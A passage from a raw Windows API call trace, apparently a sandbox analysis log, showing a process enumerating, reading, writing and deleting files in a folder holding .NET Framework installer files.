lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f030*=0xe2c, lpOverlapped=0x0) returned 1 [0076.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0076.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0076.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0076.558] GetLastError () returned 0x0 [0076.558] SetLastError (dwErrCode=0x0) [0076.558] GetLastError () returned 0x0 [0076.558] SetLastError (dwErrCode=0x0) [0076.558] GetLastError () returned 0x0 [0076.558] SetLastError (dwErrCode=0x0) [0076.558] ReadFile (in: hFile=0x42c, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0076.559] GetLastError () returned 0x0 [0076.559] SetLastError (dwErrCode=0x0) [0076.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc) returned 0x7d618 [0076.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d660 [0076.559] GetLastError () returned 0x0 [0076.559] SetLastError (dwErrCode=0x0) [0076.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0076.559] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0xe30, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327ef70*=0xe30, lpOverlapped=0x0) returned 1 [0076.560] GetLastError () returned 0x0 [0076.560] SetLastError (dwErrCode=0x0) [0076.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0076.560] GetLastError () returned 0x0 [0076.560] SetLastError (dwErrCode=0x0) [0076.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0076.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0076.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d660 | out: hHeap=0x20000) returned 1 [0076.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0076.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0076.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0076.560] CloseHandle (hObject=0x428) returned 1 [0076.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88b38 | out: hHeap=0x20000) returned 1 [0076.561] CloseHandle (hObject=0x42c) returned 1 [0076.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0076.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0076.562] AreFileApisANSI () returned 1 [0076.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0076.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x68b80 [0076.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x68b80, cchWideChar=33 | out: lpWideCharStr="C:\\588bce7c90097ed212\\header.bmp") returned 33 [0076.562] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0076.563] GetFileType (hFile=0x42c) returned 0x1 [0076.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0076.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x88b38 [0076.563] GetLastError () returned 0xb7 [0076.563] SetLastError (dwErrCode=0xb7) [0076.563] WriteFile (in: hFile=0x42c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0076.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88b38 | out: hHeap=0x20000) returned 1 [0076.564] CloseHandle (hObject=0x42c) returned 1 [0076.564] AreFileApisANSI () returned 1 [0076.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0076.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x693f0 [0076.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x693f0, cchWideChar=33 | out: lpWideCharStr="C:\\588bce7c90097ed212\\header.bmp") returned 33 [0076.564] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp")) returned 1 [0076.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0076.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0076.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0076.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0076.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0076.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0076.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0076.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0076.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0076.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0076.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x94680 | out: hHeap=0x20000) returned 1 [0076.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bbf8 | out: hHeap=0x20000) returned 1 [0076.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0076.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0076.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0076.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0076.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0076.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0076.566] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.566] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.566] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x66ea7e00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0x66ea7e00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0x66ea7e00, ftLastWriteTime.dwHighDateTime=0x1cac6e3, nFileSizeHigh=0x0, nFileSizeLow=0xad1384b, dwReserved0=0x1, dwReserved1=0x0, cFileName="netfx_Core.mzz", cAlternateFileName="NETFX_~1.MZZ")) returned 1 [0076.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0076.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0076.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0076.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0076.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0076.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0076.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0076.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0076.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0076.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0076.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0076.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0076.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0076.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0076.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0076.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0076.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0076.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0076.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0076.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0076.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0076.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0076.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0076.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0076.566] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.566] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.567] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.567] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0076.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0076.567] AreFileApisANSI () returned 1 [0076.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core.mzz", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\netfx_Core.mzz", lpUsedDefaultChar=0x0) returned 37 [0076.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0076.567] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.567] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0076.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0076.567] AreFileApisANSI () returned 1 [0076.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0076.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4a) returned 0x6d058 [0076.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x6d058, cchWideChar=37 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 37 [0076.567] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.567] GetLastError () returned 0x2 [0076.567] GetLastError () returned 0x2 [0076.567] SetLastError (dwErrCode=0x2) [0076.567] GetLastError () returned 0x2 [0076.567] SetLastError (dwErrCode=0x2) [0076.567] GetLastError () returned 0x2 [0076.567] SetLastError (dwErrCode=0x2) [0076.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0076.568] AreFileApisANSI () returned 1 [0076.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0076.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4a) returned 0x6d478 [0076.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x6d478, cchWideChar=37 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 37 [0076.568] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.568] GetLastError () returned 0x2 [0076.568] GetLastError () returned 0x2 [0076.568] SetLastError (dwErrCode=0x2) [0076.568] GetLastError () returned 0x2 [0076.568] SetLastError (dwErrCode=0x2) [0076.568] GetLastError () returned 0x2 [0076.568] SetLastError (dwErrCode=0x2) [0076.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0076.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0076.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0076.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0076.568] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.568] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.568] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xc183da00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0xc183da00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0xc183da00, ftLastWriteTime.dwHighDateTime=0x1cac6e3, nFileSizeHigh=0x0, nFileSizeLow=0x1d0200, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="netfx_Core_x64.msi", cAlternateFileName="NETFX_~1.MSI")) returned 1 [0076.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0076.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0076.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0076.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0076.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0076.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0076.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0076.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0076.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0076.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0076.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0076.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0076.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0076.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0076.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0076.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0076.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0076.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0076.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0076.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0076.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0076.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0076.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0076.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0076.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0076.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0076.569] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.569] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.569] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.569] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0076.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0076.569] AreFileApisANSI () returned 1 [0076.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core_x64.msi", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\netfx_Core_x64.msi", lpUsedDefaultChar=0x0) returned 41 [0076.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0076.569] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.569] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0076.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0076.569] AreFileApisANSI () returned 1 [0076.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0076.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67540 [0076.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 41 [0076.570] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.570] GetLastError () returned 0x2 [0076.570] GetLastError () returned 0x2 [0076.570] SetLastError (dwErrCode=0x2) [0076.570] GetLastError () returned 0x2 [0076.570] SetLastError (dwErrCode=0x2) [0076.570] GetLastError () returned 0x2 [0076.570] SetLastError (dwErrCode=0x2) [0076.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0076.570] AreFileApisANSI () returned 1 [0076.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0076.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67900 [0076.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 41 [0076.570] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.570] GetLastError () returned 0x2 [0076.570] GetLastError () returned 0x2 [0076.570] SetLastError (dwErrCode=0x2) [0076.570] GetLastError () returned 0x2 [0076.570] SetLastError (dwErrCode=0x2) [0076.570] GetLastError () returned 0x2 [0076.570] SetLastError (dwErrCode=0x2) [0076.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0076.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0076.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0076.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0076.571] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.571] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.571] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4c130c00, ftCreationTime.dwHighDateTime=0x1cac6d9, ftLastAccessTime.dwLowDateTime=0x4c130c00, ftLastAccessTime.dwHighDateTime=0x1cac6d9, ftLastWriteTime.dwLowDateTime=0x4c130c00, ftLastWriteTime.dwHighDateTime=0x1cac6d9, nFileSizeHigh=0x0, nFileSizeLow=0x11c000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="netfx_Core_x86.msi", cAlternateFileName="NETFX_~2.MSI")) returned 1 [0076.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0076.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0076.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0076.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0076.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0076.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0076.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0076.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0076.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0076.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0076.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0076.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0076.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0076.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0076.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) 